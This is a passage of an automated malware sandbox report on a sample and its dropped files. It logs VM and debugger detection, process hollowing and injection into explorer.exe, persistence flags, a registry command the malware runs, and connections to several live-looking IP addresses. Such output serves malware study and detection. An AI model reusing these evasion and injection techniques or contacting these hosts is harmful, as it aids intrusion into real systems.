Source: XVM5nluelx.exe, 00000000.00000002.2068735745.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, dejcbcc, 00000004.00000002.2342440036.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: dejcbcc, 00000029.00000002.3254548800.0000000002F27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKM.
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_02FC871C rdtsc 8_2_02FC871C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 9_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 14_2_0040E670
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2018
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 764
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 738
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 741
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 448
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 425
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\33A3.exe API coverage: 4.0 %
Source: C:\Windows\explorer.exe TID: 2888 Thread sleep time: -201800s >= -30000s
Source: C:\Windows\explorer.exe TID: 5520 Thread sleep time: -76400s >= -30000s
Source: C:\Windows\explorer.exe TID: 4676 Thread sleep time: -31300s >= -30000s
Source: C:\Windows\explorer.exe TID: 5396 Thread sleep time: -34000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\dejcbcc Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 9_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 14_2_0040FB98
Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 0000001E.00000002.3273089936.000000000BF44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000009
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 0000001E.00000003.3082332042.000000000C022000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}wC.exe=
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000b
Source: explorer.exe, 0000001E.00000002.3261048206.0000000007BE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422986001.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000797000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000655000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.0000000000655000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 33A3.exe, 00000009.00000002.2422986001.0000000000888000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000|
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}W)
Source: explorer.exe, 0000001E.00000003.3052777577.0000000007BDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: explorer.exe, 0000001E.00000002.3263362552.0000000008423000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}@N
Source: explorer.exe, 0000001E.00000002.3261048206.0000000007BE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000t
Source: explorer.exe, 0000001E.00000002.3273089936.000000000BF44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\
Source: explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9507e
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 0000001E.00000003.3007904273.0000000008636000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: explorer.exe, 0000001E.00000003.3082332042.000000000C022000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}dll
Source: explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-GB\msmouse.inf_loc
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2047730753.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22658-3\
Source: C:\Users\user\AppData\Local\Temp\33A3.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\XVM5nluelx.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\XVM5nluelx.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\XVM5nluelx.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\dejcbcc System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\dejcbcc System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\XVM5nluelx.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\dejcbcc Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\dejcbcc Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_02FC871C rdtsc 8_2_02FC871C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00424168 _memset,IsDebuggerPresent, 9_2_00424168
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 9_2_0042A57A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 9_2_00412220
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E20D90 mov eax, dword ptr fs:[00000030h] 0_2_02E20D90
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02E2092B mov eax, dword ptr fs:[00000030h] 0_2_02E2092B
Source: C:\Users\user\Desktop\XVM5nluelx.exe Code function: 0_2_02ED1D00 push dword ptr fs:[00000030h] 0_2_02ED1D00
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_02E20D90 mov eax, dword ptr fs:[00000030h] 4_2_02E20D90
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_02E2092B mov eax, dword ptr fs:[00000030h] 4_2_02E2092B
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_02E91670 push dword ptr fs:[00000030h] 4_2_02E91670
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_02FC70A3 push dword ptr fs:[00000030h] 8_2_02FC70A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_04A00042 push dword ptr fs:[00000030h] 8_2_04A00042
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 13_2_02EB70A3 push dword ptr fs:[00000030h] 13_2_02EB70A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 13_2_04A40042 push dword ptr fs:[00000030h] 13_2_04A40042
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_004278D5 GetProcessHeap, 9_2_004278D5
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_004329BB SetUnhandledExceptionFilter, 9_2_004329BB
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_004329BB SetUnhandledExceptionFilter, 14_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe File created: dejcbcc.2.dr
Source: C:\Windows\explorer.exe Network Connect: 103.174.152.66 443
Source: C:\Windows\explorer.exe Network Connect: 193.233.132.167 80
Source: C:\Windows\explorer.exe Network Connect: 91.92.253.69 80
Source: C:\Windows\explorer.exe Network Connect: 185.154.13.143 80
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443
Source: C:\Windows\explorer.exe Network Connect: 162.159.129.233 443
Source: C:\Windows\explorer.exe Network Connect: 158.160.165.129 80
Source: C:\Windows\explorer.exe Network Connect: 104.196.109.209 443
Source: C:\Windows\explorer.exe Network Connect: 189.195.132.134 80
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_04A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 8_2_04A00110
Source: C:\Users\user\Desktop\XVM5nluelx.exe Thread created: C:\Windows\explorer.exe EIP: 30019A0
Source: C:\Users\user\AppData\Roaming\dejcbcc Thread created: unknown EIP: 32019A0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Memory written: C:\Users\user\AppData\Local\Temp\33A3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Memory written: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\XVM5nluelx.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\XVM5nluelx.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\dejcbcc Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\dejcbcc Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 9_2_00419F90
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2047599413.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3260994342.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.3261048206.0000000007AC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3260994342.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd.J
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0Progman
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2046328419.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_04A280F6 cpuid 8_2_04A280F6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 8_2_04A33F87
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 8_2_04A2C8B7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 8_2_04A349EA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 8_2_04A3394D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 8_2_04A40AB6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 9_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 9_2_00438178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 9_2_00440116
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 9_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 9_2_00438423
